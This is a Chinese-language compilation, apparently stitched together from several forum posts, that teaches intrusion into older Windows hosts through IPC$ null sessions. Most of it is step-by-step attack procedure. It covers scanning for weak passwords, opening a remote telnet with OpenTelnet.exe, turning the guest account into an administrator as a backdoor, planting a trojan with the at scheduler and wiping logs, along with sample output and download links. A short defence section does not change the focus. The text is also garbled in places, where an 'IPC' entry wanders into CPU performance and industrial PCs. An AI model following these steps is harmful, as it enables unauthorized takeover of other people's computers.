5 得到遠程主機的用戶名列表
nbtstat -A IP
6 得到本地主機的用戶列表
net user
7 查看遠程主機的當前時間
net time \\IP
8 顯示本地主機當前服務
net start
9 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y
10 映射遠程共享:
net use z: \\IP\baby
此命令將共享名為baby的共享資源映射到z盤
11 刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del /y刪除全部
12 向遠程主機復制文件
\路徑\srv.exe \\IP\共享目錄名,如:
ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內
13 遠程添加計劃任務
at \\ip 時間 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
14 開啟遠程主機的telnet
這里要用到一個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求:
1)目標開啟了ipc$共享
2)你要擁有管理員密碼和帳號
3)目標開啟RemoteRegistry服務,用戶就該ntlm認證
4)對WIN2K/XP有效,NT未經測試
命令格式:OpenTelnet.exe \\server account psw NTLM認證方式 port
試例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用戶/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 關閉遠程主機的telnet
同樣需要一個小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
試例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 刪除一個已建立的ipc$連接
net use \\IP\ipc$ /del
(本教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區原創http://ccbirds.yeah.net)
十二 ipc$完整入侵步驟祥解
其實入侵步驟隨個人愛好有所不同,我就說一下常見的吧,呵呵,獻丑了!
1 用掃描軟體搜尋存在若口令的主機,比如流光,SSS,X-scan等,隨你的便,然後鎖定目標,如果掃到了管理員許可權的口令,你可以進行下面的步驟了,假設你現在得到了administrator的密碼為空
2 此時您有兩條路可以選擇:要麼給對方開telnet(命令行),要麼給它傳木馬(圖形界面),那我們就先走telnet這條路吧
3上面開telnet的命令沒忘吧,要用到opentelnet這個小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: [email protected]
OpenTelnet.exe
UsagepenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*說明你已經打開了一個埠90的telnet。
4 現在我們telnet上去
telnet 192.168.21.* 90
如果成功,你將獲得遠程主機的一個shell,此時你可以像控制自己的機器一樣控制你的肉雞了,那麼做點什麼呢?把guest激活再加入管理組吧,就算留個後門了
5 C:\>net user guest /active:yes
*將Guest用戶激活,也有可能人家的guest本來就試活的,你可以用net user guest看一下它的帳戶啟用的值是yes還是no
6 C:\>net user guest 1234
*將Guest的密碼改為1234,或者改成你喜歡的密碼
7 C:\>net localgroup administrators guest /add
*將Guest變為Administrator,這樣,即使以後管理員更改了他的密碼,我們也可以用guest登錄了,不過也要提醒您,因為通過安全策略的設置,可以禁止guest等帳戶的遠程訪問,呵呵,如果真是這樣,那我們的後門也就白做了,願上帝保佑Guest。
8 好了,現在我們來走另一條路,給它傳個木馬玩玩
9 首先,我們先建立起ipc$連接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator
10 既然要上傳東西,就要先知道它開了什麼共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享資源
資源共享名 類型 用途 注釋
-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我們看到對方共享了C,D兩個盤,我們下面就可以向任意一個盤復制文件了。再次聲明,因為用net view命令無法看到默認共享,因此通過上面返回的結果,我們並不能判斷對方是否開啟了默認共享。
11 C:\> love.exe \\192.168.21.*\c
已復制 1 個文件
*用這個命令你可以將木馬客戶端love.exe傳到對方的c盤下,當然,如果能復制到系統文件夾下是最好的了,不容易被發現
12 運行木馬前,我們先看看它現在的時間
net time \\192.168.21.*
\\192.168.21.*的當前時間是 2003/8/22 上午 11:00
命令成功完成
13 現在我們用at運行它吧,不過對方一定要開了Task Scheler服務(允許程序在指定時間運行),否則就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一項作業,其作業 ID = 1
14 剩下就是等了,等過了11:02,你就可以用控制端去連接了,如果成功你將可以用圖形界面去控制遠程主機了,如果連接失敗,那麼它可能在區域網里,也可能程序被防火牆殺了,還可能它下線了(沒這么巧吧),無論哪種情況你只好放棄了
嗯,好了,兩種基本方法都講了。如果你對上面的操作已經輕車熟路了,也可以用更高效的套路,比如用CA克隆guest,用p***ec執行木馬,用命令:p***ec \\tergetIP -u user -p paswd cmd.exe直接獲得shell等,這些都是可以得,隨你的便。不過最後不要忘了把日誌清理干凈,可以用榕哥的elsave.exe。
講了ipc$的入侵,就不能不說如何防範,那麼具體要怎樣做呢?看下面
十三 如何防範ipc$入侵
1 禁止空連接進行枚舉(此操作並不能阻止空連接的建立)
方法1:
運行regedit,找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:1
如果設置為"1",一個匿名用戶仍然可以連接到IPC$共享,但限制通過這種連接得到列舉SAM帳號和共享等信息;在Windows 2000 中增加了"2",限制所有匿名訪問除非特別授權,如果設置為2的話,可能會有一些其他問題發生,建議設置為1。如果上面所說的主鍵不存在,就新建一個再改鍵值。
方法2:
在本地安全設置-本地策略-安全選項-在'對匿名連接的額外限制'中做相應設置
2 禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(重起後默認共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)禁止自動打開默認共享(此操作並未關閉ipc$共享)
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)一個主健再改鍵值。這兩個鍵值在默認情況下在主機上是不存在的,需要自己手動添加。
3 關閉ipc$和默認共享依賴的服務erver服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-選已禁用 這時可能會有提示說:XXX服務也會關閉是否繼續,因為還有些次要的服務要依賴於lanmanserver,不要管它。
4 屏蔽139,445埠
由於沒有以上兩個埠的支持,是無法建立ipc$的,因此屏蔽139,445埠同樣可以阻止ipc$入侵。
1)139埠可以通過禁止NBT來屏蔽
本地連接-TCP/IT屬性-高級-WINS-選『禁用TCP/IT上的NETBIOS』一項
2)445埠可以通過修改注冊表來屏蔽
添加一個鍵值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完後重啟機器
注意:如果屏蔽掉了以上兩個埠,你將無法用ipc$入侵別人。
3)安裝防火牆進行埠過濾
5 設置復雜密碼,防止通過ipc$窮舉出密碼。
十四 ipc$入侵問答精選
上面說了一大堆的理論東西,但在實際中你會遇到各種各樣的問題,因此為了給予大家最大的幫助,我看好幾個安全論壇,找了n多的帖子,從中整理了一些有代表性的問答,其中的一些答案是我給出的,一些是論壇上的回復,如果有什麼疏漏和錯誤,還請包涵。
1.進行ipc$入侵的時候,會在伺服器中留下記錄,有什麼辦法可以不讓伺服器發現嗎?
答:留下記錄是一定的,你走後用程序刪除就可以了,或者用肉雞入侵。
2.你看下面的情況是為什麼,可以連接但不能復制
net use \\***.***.***.***\ipc$ "密碼" /user:"用戶名"
命令成功
icmd.exe \\***.***.***.***\admin$
找不到網路路徑
命令不成功
答:可能有兩個原因:
1)你的許可權不夠,不能訪問默認共享;
2)對方沒有開啟admin$默認共享,不要認為能進行ipc$連接,對方就一定開了默認共享(很多人都這么以為,誤區!!),此時你可以試試別的默認共享或普通共享,比如c$,d$,c,d等,如果還是不行,就要看你的許可權了,如果是管理員許可權,你可以開telnet,如果能成功,在給它開共享也行。
3.如果對方開了IPC$,且能建立空聯接,但打開C、D盤時,都要求密碼,我知道是空連接沒有太多的許可權,
4. IPC是什麼
IPC(Inter-Process Communication,進程間通信)
IPC (CPU每一時鍾周期內所執行的指令多少)
IPC代表了一款處理器的設計架構,一旦該處理器設計完成之後,IPC值就不會再改變了。在這里,IPC值的高低起到了決定性的作用,而頻率似乎不再高於一切。
實際上是頻率和IPC在真正影響CPU性能。准確的CPU性能判斷標准應該是:CPU性能=IPC(CPU每一時鍾周期內所執行的指令多少)×頻率(MHz時鍾速度),這個公式最初由英特爾提出並被業界廣泛認可。
如果將英特爾用於企業級伺服器的主頻為800MHz的安騰處理器(英特爾的最高級系列CPU)與用於台式機的主頻為1800MHz的奔騰4處理器進行對比,我們就會發現:主頻僅為800MHz的安騰處理器在性能上竟然比主頻高達1800MHz的奔騰4處理器還要強大。
IPC 進程間通信
IPC(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。IPC是NT/2000的一項新功能,它有一個特點,即在同一時間內,兩個IP之間只允許建立一個連接。NT/2000在提供了ipc功能的同時,在初次安裝系統時還打開了默認共享,即所有的邏輯共享(c,d,e……)和系統目錄winnt或windows(admin)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。
平時我們總能聽到有人在說ipc漏洞,ipc漏洞,其實ipc並不是一個真正意義上的漏洞,我想之所以有人這么說,一定是指微軟自己安置的那個『後門』:空會話(Null session)。
IPC即工業個人計算機(Instrial Personal Computer─IPC)是一種加固的增強型個人計算機,它可以作為一個工業控制器在工業環境中可靠運行。早在80年代初期,美國AD公司就推出了類似IPC的MAC-150工控機,隨後美國IBM公司正式推出工業個人計算機IBM7532。由於IPC的性能可靠、軟體豐富、價格低廉,而在工控機中異軍突起,後來居上,應用日趨廣泛。目前,IPC已被廣泛應用於通訊、工業控制現場、路橋收費、醫療、環保及人們生活的方方面面。
IPC的技術特點:
1、採用符合「EIA」標準的全鋼化工業機箱,增強了抗電磁干擾能力。
2、採用匯流排結構和模塊化設計技術。CPU及各功能模塊皆使用插板式結構,並帶有壓桿軟鎖定,提高了抗沖擊、抗振動能力。
3、機箱內裝有雙風扇,正壓對流排風,並裝有濾塵網用以防塵。
4、配有高度可靠的工業電源,並有過壓、過流保護。
5、電源及鍵盤均帶有電子鎖開關,可防止非法開、關和非法鍵盤輸入。
6、具有自診斷功能。
7、可視需要選配I/O模板。
8、設有「看門狗」定時器,在因故障死機時,無需人的干預而自動復位。
9、開放性好,兼容性好,吸收了PC機的全部功能,可直接運行PC機的各種應用軟體。
10、可配置實時操作系統,便於多任務的調度和運行。
11、可採用無源母板(底板),方便系統升級。
IPC的主要結構:
1、全鋼機箱
IPC的全鋼機箱是按標准設計的,抗沖擊、抗振動、抗電磁干擾,內部可安裝同PC-bus兼容的無源底板。
2、無源底板
無源底板的插槽由ISA和PCI匯流排的多個插槽組成,ISA或PCI插槽的數量和位置根據需要有一定選擇,該板為四層結構,中間兩層分別為地層和電源層,這種結構方式可以減弱板上邏輯信號的相互干擾和降低電源阻抗。底板可插接各種板卡,包括CPU卡、顯示卡、控制卡、I/O卡等。
3、工業電源
為AT開關電源,平均無故障運行時間達到250,000小時。
4、CPU卡
IPC的CPU卡有多種,根據尺寸可分為長卡和半長卡,根據處理器可分為386、486、586、PII、PIII主板,用戶可視自己的需要任意選配。其主要特點是:工作溫度0-600C;裝有「看門狗」計時器;低功耗,最大時為5V/2.5A。
5、其他配件:
IPC的其他配件基本上都與PC機兼容,主要有CPU、內存、顯卡、硬碟、軟碟機、鍵盤、滑鼠、光碟機、顯示器等。
IPC網路入侵
為了幫助大家更好的學習IPC,我在這里特定整理及完善了一下IPC的概念、一些常用命令、在IPC出現在些問題的原因等等,資料大都來自網際網路,由於不知道作者名字,故不能標記內容來處,敬請見諒。
一、IPC的概念
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。事實上他算得上是微軟提供的一種比較實用的服務,在實現資源共享這一方面可以說起到了一個比較重要的作用,只是平時被用來的比較少,而大多數是被黑客用來進行攻擊,因此常常會被人說成是漏洞。其實它並不是一個真正意義上的漏洞,它是指微軟自己安置的『後門』:空會話(Null session)。
空會話的概念
空會話是在沒有信任的情況下與伺服器建立的會話,對於一個空會話,LSA提供的令牌的SID(空會話的SID)是S-1-5-7,用戶名是:ANONYMOUS LOGON(系統內置的帳號),該訪問令牌包含下面偽裝的組:Everyone和Network。
二、IPC建立的過程
1)會話請求者(客戶)向會話接收者(伺服器)傳送一個數據包,請求安全隧道的建立;
2)伺服器產生一個隨機的64位數(實現挑戰)傳送回客戶;
3)客戶取得這個由伺服器產生的64位數,用試圖建立會話的帳號的口令打亂它,將結果返回到伺服器(實現響應);
4)伺服器接受響應後發送給本地安全驗證(LSA),LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是伺服器的本地帳號,核實本地發生;如果請求的帳號是一個域的帳號,響應傳送到域控制器去核實。當對挑戰的響應核實為正確後,一個訪問令牌產生,然後傳送給客戶。客戶使用這個訪問令牌連接到伺服器上的資源直到建議的會話被終止。
三、IPC連接條件
★ 跟操作系統相關(NT/2000/XP可以建立ipc$連接,98/ME不能建立ipc$連接);
★ 目標主機必須要開啟ipc$共享;
★ 本地主機必須要啟動Lanmanworkstation服務(功能為提供網路鏈結和通訊);
★ 目標主機必須要啟動Lanmanserver服務(ipc$依賴於此服務,它提供了 RPC 支持、文件、列印以及命名管道共享);
★ 目標主機必須要啟動NetLogon,它支持網路上計算機 pass-through 帳戶登錄身份;
★ 目標主機應該啟動NBT(打開139埠);
★ 目標主機防火牆配置(如果屏蔽139和445埠也將導致連接失敗);
★ 用戶名或者密碼錯誤;
★ 命令輸入錯誤(特別要注意空格的輸入,用戶名和密碼中不包含空格時兩邊的雙引號可以省略,密碼為空,直接輸入兩個引號"");
★ 建立好連接後目標主機重啟,ipc$連接會自動斷開。
四、連接錯誤號分析
錯誤號5: 拒絕訪問,許可權不夠;
錯誤號51: 無法找到網路路徑(網路有問題);
錯誤號53: 找不到網路路徑(ip地址錯誤;目標主機未開機;目標主機lanmanserver服務未啟動;目標主機防火牆設置過濾埠);
錯誤號67: 找不到網路名(本地主機中lanmanworkstation服務未啟動或者目標主機刪除了ipc$);
錯誤號1219: 提供的憑據與已存在的憑據集沖突(已經建立了一個ipc$,可以刪除再連);
錯誤號1326: 用戶名或密碼錯誤;
錯誤號1792: 試圖登錄,網路登錄服務沒有啟動(目標主機中NetLogon服務未啟動);
錯誤號2242: 該用戶的密碼已經過期。
五、常用口令
★ 建立空連接: net use \\IP\ipc$ "" /user:""
★ 建立非空連接: net use \\IP\ipc$ "password" /user:"username"
★ 查看遠程主機的共享資源(但看不到默認共享) net view \\IP
★ 查看本地主機的共享資源(可以看到本地的默認共享) net share
★ 得到遠程主機的用戶名列表 nbtstat -A IP
★ 得到本地主機的用戶列表 net user
★ 查看遠程主機的當前時間 net time \\IP
★ 顯示本地主機當前服務 net start
★ 啟動/關閉本地服務 net start 服務名 /y net stop 服務名 /y
★ 映射遠程共享: net use z: \\IP\sihochina 此命令將共享名為sihochina的共享資源映射到z盤
★ 刪除共享映射 net use z: /del /y 刪除映射的z盤net use * /del /y 刪除全部
★ 向遠程主機復制文件 \路徑\*.exe \\IP\共享目錄名,如: sihochina.exe \\IP\c 將當前目錄下的sihochina.exe復制到對方c盤內
★ 遠程添加計劃任務 at \\ip 時間 程序名,如: at \\192.168.0.1 11:00 sihochina.exe 11:00在主機192.168.0.1上運行sihochina.exe
本文所用的方法主要是在VISTA 旗艦版SP2以及XP SP2的環境下測試的,別的系統沒做測試,不過相信都大同小異,出現的問題也應該差不多,我將列舉我在兩個系統的實驗中所出現的所有問題供大家參考。
另外如果是初學者,對IPC及DOS命令毫無概念,請配合上一篇《IPC基礎及IPC-DOS命令》一起閱讀。
下面開始進入正題吧!
第一步,按WIN+R彈出一個運行框(別告訴我說WIN鍵都不知道是哪一個,那沒救了!就是打開開始菜單的那個鍵,上面有一個WINDOWS的標志的鍵),鍵入CMD,進入DOS中。
第二步,輸入net use \\目標IP\ipc$ "密碼" /user:"用戶名"。輸入完這個之後,將會顯示命令成功完成的提示符。值的注意的是語法的格式問題。在這條語法中一共有四個空格。USE前後各有一個空格,密碼前後各有一個空格。此外需要注意的是這里的用戶名和密碼是入侵主機的登錄系統用的用戶名和密碼而非寬頻撥號的那個。在這個過程中,如果目標機是VISTA系統的話,那麼可以很輕松的入侵,因為VISTA系統中微軟默認就把SERVER服務給開了,只要知道用戶名和密碼就可以進來。而XP中卻是關閉的,如果別人用的是XP系統而你又只是做實驗的話那就放棄吧。或者你還不死心,打個電話給別人叫別人開一下吧!別人問你怎麼開怎麼辦?如果你也不知道的話,暈,算了,好人做到底了,我告訴你吧,免得你去網路上去找了。打開「控制面板-經典視圖-管理工具-服務」在服務項目中找到SERVER那一項,然後自己想辦法開啟吧!要再不會,那我也沒轍了!
第三步,輸入net view \\目標IP 查看一下目標開放了哪些共享。如果對方已將全部的盤上的資源都共享了的話,那麼已經可以說入侵已經接近尾聲了(在XP中默認開啟的共享有:列印機什麼的,而VISTA默認中幾乎把所有的共享都開了)。但是如果對方沒有開啟共享的話那我們就得自己想辦法來解決這個問題了。一般我們都是用telnet這項服務進入對方的電腦,然後幫他開啟你想要的那些共享。那麼怎麼樣進入telnet呢?這又是一個比較大的問題了。在XP中默認telnet服務是禁用的,也就是說你不可以用這項服務。而VISTA做的更絕,在服務項中都沒有這一項,不過沒關系我們可以自己加。具體方法如下:「控制面板-進入控制面板主頁-打開或關閉WINDOWS功能(左下方)-在裡面找到telnet兩項都添加就行」。碰到這種情況,像我們這種做實驗的類型的應該就要選擇放棄了。如果你再打個電話叫對方把禁用去掉,改成自動的,那麼情況又不一樣了(修改方法和剛才開啟SERVER差不多,這里就不詳細介紹了),只要不是禁用,不管他的服務有沒有開啟我們都有辦法把它變成開啟的。下面我給大家介紹一個比較簡單的方法。首先打開「記事本-在裡面輸入@net statr telnet"保存為opentelnet.bat放在C盤中吧!這里是用的一個批處理命令來實現的,具體怎麼實現的在這里我就不多說了,因為今天的重點不是它。大家按做就行了,不過我可以告訴大家的是這個命令的效果就是打開停用的telnet服務(注意是停用的而非禁用的)。接下來我們要做的就是把這個文件復制到目標機的根目錄中去。具體操作為:
第四步,輸入 c:\opentelnet.bat \\目標IP\admin$ 這樣我們就把剛才建的那個文件復制到對方主機的根目錄中去了。不過在復制的過程中可能會出現在一些問題,我在向XP中上復制時就出現問題了,而且一直找不到問題出在哪,不過復制失敗的原因具體有以下一些,我從網上找的,現在COPY過來。
復制文件的時候提示出錯,原因可能有以下幾個方面:
1)盲目復制:
復制根本就不存在的共享文件,復制前應使用net view \\IP命令查看目標主機的共享情況;
2)默認共享判斷錯誤:
★ ipc$共享與默認共享是兩碼事,ipc$共享是一個命名管道,不是具體的文件夾,而默認共享並不是ipc$共享的必要條件;
★ net view \\IP 無法顯示默認共享(因為默認共享帶$),我們無法通過這個命令判斷對方是否開啟了默認共享。
3)用戶許可權不夠:
★ 空連接向所有共享(默認共享和普通共享)復制時,大多情況下許可權是不夠的;
★ 向默認共享復制時,要具有管理員許可權;
★ 向普通共享復制時,要具有相應許可權(即目標主機預設的訪問許可權);
★ 目標主機通過防火牆或安全軟體的設置,禁止外部訪問共享;
4)被防火牆殺死或在區域網
第五步,運行這個文件。就這要用到我們的at命令了。方法如下:首先看一下目標機的時間。鍵入net time 目標機IP 知道目標機時間我們就可以給它一個任務讓它在要求的時間運行。假設剛才看到的時間為14:20,那麼我們可以鍵入 at opentelnet.bat 14:30 \\目標IP 這行命令將使目標機在14:30的時候准時運行opentelnet.bat這個文件。
第六步,telnet 目標IP 這就是和對方建立telnet連接,有了這個連接我們可以在別人的計算機上做任何事了,損害他人利益的事禁止做,否則格殺勿論。具體可以做哪些事我也不自己寫了,累啊,復制一下:
★ 在遠程主機上建立用戶,激活用戶,修改用戶密碼,加入管理組等操作;
★ 打開遠程主機的ipc$共享,默認共享,普通共享的操作;
★ 運行/關閉遠程主機的服務;
★ 啟動/殺掉遠程主機的進程。
其中第二個應用才是我們要做的事,打開主機的IPC$共享(加一個美元符號其實就是打開共享之後不會在對方機器上顯示一個手托盤的符號)
第七步,先退出telnet,輸入exit就可以了。然後鍵入 net use h: \\目標IP\c$ 這個命令的作用是將對方的C盤映射到本地盤的h盤,其中h盤不能是本機原來已有的盤。映射,不懂?好的,不急。我來解釋一下:就是把別人的東西反射到自己的電腦,然後可以對其進行任何操作,就相當於是自己的電腦一樣,至此,恭喜你,入侵成功
5. 等高手解答139問題~
IPC$ 是黑客入侵的重要方式,筆者在這里給大家介紹一下它的用法,希望大家通過深入了解ipc$ ,並熟練掌握它的用法。本文適用於win NT/2000環境下,win98不在討論之列,對於win Xp個別操作並不適用。
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。
至於ipc$漏洞,其實它並不是一個真正意義上的漏洞,它是指微軟自己安置的『後門』:空會話(Null session)。
會話的建立 :
建立會話的過程大致如下:
1)會話請求者(客戶)向會話接收者(伺服器)傳送一個數據包,請求安全隧道的建立;
2)伺服器產生一個隨機的64位數(實現挑戰)傳送回客戶;
3)客戶取得這個由伺服器產生的64位數,用試圖建立會話的帳號的口令打亂它,將結果返回到伺服器(實現響應);
4)伺服器接受響應後發送給本地安全驗證(LSA),LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是伺服器的本地帳號,核實本地發生;如果請求的帳號是一個域的帳號,響應傳送到域控制器去核實。當對挑戰的響應核實為正確後,一個訪問令牌產生,然後傳送給客戶。客戶使用這個訪問令牌連接到伺服器上的資源直到建議的會話被終止。
空會話是在沒有信任的情況下與伺服器建立的會話,對於一個空會話,LSA提供的令牌的SID(空會話的SID)是S-1-5-7,用戶名是:ANONYMOUS LOGON(系統內置的帳號),該訪問令牌包含下面偽裝的組:Everyone 和 Network
以下是在空會話中能夠使用的命令:
1. 建立一個空會話
命令:net use \\ip\ipc$ "" /user:""
注意:密碼左右各一個空格,目標主機需要開放ipc$。
2. 查看遠程主機的共享資源
命令:net view \\IP
解釋:建立了空連接後,用來查看遠程主機的共享資源。
3. 查看遠程主機的當前時間
命令:net time \\IP
解釋:用此命令可以得到一個遠程主機的當前時間。
4. 得到遠程主機的NetBIOS用戶名列表
命令:nbtstat -A IP
解釋:用此命令可以得到一個遠程主機的NetBIOS用戶名列表,返回結果如下:
注意:本地主機的NBT需要打開。
知識鏈接:
★ SMB:(Server Message Block) Windows協議族,用於文件列印共享的服務;
★ NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)埠實現基於TCP/IP協議的NETBIOS網路互聯。
對於ipc$埠的選擇,這里以WINDOWS 2000 為例:
對於客戶端:
1. 在允許NBT的情況下連接伺服器時,客戶端會同時嘗試訪問139和445埠,如果445埠有響應,那麼就發送RST包給139埠斷開連接,用455埠進行會話,當445埠無響應時,才使用139埠,如果兩個埠都沒有響應,則會話失敗;
2. 在禁止NBT的情況下連接伺服器時,那麼客戶端只會嘗試訪問445埠,如果445埠無響應,那麼會話失敗。
對於伺服器端:
1. 如果允許NBT, UDP埠137, 138 ,TCP 埠139, 445將開放;
2. 如果禁止NBT,只有445埠開放。
在進行實際的ipc$連接時,往往會遇到系統提示連接失敗。我把可以成功建立ipc$的條件列出,希望大家可以通過這些找到連接失敗的原因:
★ 跟操作系統相關(NT/2000/XP可以建立ipc$連接,98/ME不能建立ipc$連接);
★ 目標主機必須要開啟ipc$共享;
★ 本地主機必須要啟動Lanmanworkstation服務(功能為提供網路鏈結和通訊);
★ 目標主機必須要啟動Lanmanserver服務(ipc$依賴於此服務,它提供了 RPC 支持、文件、列印以及命名管道共享);
★ 目標主機必須要啟動NetLogon,它支持網路上計算機 pass-through 帳戶登錄身份;
★ 目標主機應該啟動NBT(打開139埠);
★ 目標主機防火牆配置(如果屏蔽139和445埠也將導致連接失敗);
★ 用戶名或者密碼錯誤;
★ 命令輸入錯誤(特別要注意空格的輸入,用戶名和密碼中不包含空格時兩邊的雙引號可以省略,密碼為空,直接輸入兩個引號"");
★ 建立好連接後目標主機重啟,ipc$連接會自動斷開。
當連接建立失敗時,系統會返回一個錯誤號,此時可以通過錯誤號來分析連接失敗的原因:
錯誤號5: 拒絕訪問,許可權不夠;
錯誤號51: 無法找到網路路徑(網路有問題);
錯誤號53: 找不到網路路徑(ip地址錯誤;目標主機未開機;目標主機lanmanserver服務未啟動;目標主機防火牆設置過濾埠);
錯誤號67: 找不到網路名(本地主機中lanmanworkstation服務未啟動或者目標主機刪除了ipc$);
錯誤號1219: 提供的憑據與已存在的憑據集沖突(已經建立了一個ipc$,可以刪除再連);
錯誤號1326: 用戶名或密碼錯誤;
錯誤號1792: 試圖登錄,網路登錄服務沒有啟動(目標主機中NetLogon服務未啟動);
錯誤號2242: 該用戶的密碼已經過期。
有時候已經建立了ipc$連接,但是在復制文件的時候提示出錯,原因可能有以下幾個方面:
1)盲目復制:
復制根本就不存在的共享文件,復制前應使用net view \\IP命令查看目標主機的共享情況;
2)默認共享判斷錯誤:
★ ipc$共享與默認共享是兩碼事,ipc$共享是一個命名管道,不是具體的文件夾,而默認共享並不是ipc$共享的必要條件;
★ net view \\IP 無法顯示默認共享(因為默認共享帶$),我們無法通過這個命令判斷對方是否開啟了默認共享。
3)用戶許可權不夠:
★ 空連接向所有共享(默認共享和普通共享)復制時,大多情況下許可權是不夠的;
★ 向默認共享復制時,要具有管理員許可權;
★ 向普通共享復制時,要具有相應許可權(即目標主機預設的訪問許可權);
★ 目標主機通過防火牆或安全軟體的設置,禁止外部訪問共享;
4)被防火牆殺死或在區域網
需要在shell才能完成的命令:
★ 在遠程主機上建立用戶,激活用戶,修改用戶密碼,加入管理組等操作;
★ 打開遠程主機的ipc$共享,默認共享,普通共享的操作;
★ 運行/關閉遠程主機的服務;
★ 啟動/殺掉遠程主機的進程。
IPC$入侵常用命令:
在利用IPC$漏洞入侵主機時常用到以下這些命令:
★ 建立空連接:
net use \\IP\ipc$ "" /user:""
★ 建立非空連接:
net use \\IP\ipc$ "password" /user:"username"
★ 查看遠程主機的共享資源(但看不到默認共享)
net view \\IP
★ 查看本地主機的共享資源(可以看到本地的默認共享)
net share
★ 得到遠程主機的用戶名列表
nbtstat -A IP
★ 得到本地主機的用戶列表
net user
★ 查看遠程主機的當前時間
net time \\IP
★ 顯示本地主機當前服務
net start
★ 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y
★ 映射遠程共享:
net use z: \\IP\sihochina
此命令將共享名為sihochina的共享資源映射到z盤
★ 刪除共享映射
net use z: /del /y 刪除映射的z盤
net use * /del /y 刪除全部
★ 向遠程主機復制文件
\路徑\*.exe \\IP\共享目錄名,如:
sihochina.exe \\IP\c 將當前目錄下的sihochina.exe復制到對方c盤內
★ 遠程添加計劃任務
at \\ip 時間 程序名,如:
at \\192.168.0.1 11:00 sihochina.exe 11:00在主機192.168.0.1上運行sihochina.exe
★ 開啟遠程主機的telnet
這里要用到opentelnet.exe(下載地址1:http://www.55xz.com/Software/Catalog102/3622.html
下載地址2:http://www.yi521.com/soft/2/54.html),
目標主機還需滿足以下條件:
1)目標主機開啟了ipc$共享 ;
2)擁有目標主機的管理員帳號和密碼 ;
3)目標主機開啟了RemoteRegistry服務;
4)對WIN2K/XP有效。
命令格式:OpenTelnet.exe \\IP username password NTLM認證方式 port
如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
★ 激活用戶/加入管理員組
net uesr account /active:yes
net localgroup administrators username /add
★ 關閉遠程主機的telnet
這里要用到ResumeTelnet.exe (下載地址:http://www.yi521.com/soft/2/54.html)
命令格式:ResumeTelnet.exe \\IP username password
試例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
★ 刪除一個已建立的ipc$連接
net use \\IP\ipc$ /del
ipc$入侵步驟
1 ) 用掃描軟體搜尋存在若口令的主機(假設administrator的密碼為空);
2 )有兩條路可以選擇:給對方開telnet(命令行),給它傳木馬(圖形界面),那我們就先走telnet這條路吧 ;
3 )要用到前面下載的opentelnet.exe;
c:\>OpenTelnet.exe \\192.168.0.1 administrator "" 1 90
如果返回如下信息:
*******************************************************
Remote Telnet Configure, by refdom
Email: [email protected] OpenTelnet.exe
Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.0.1 ...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
說明你已經打開了一個埠90的telnet。
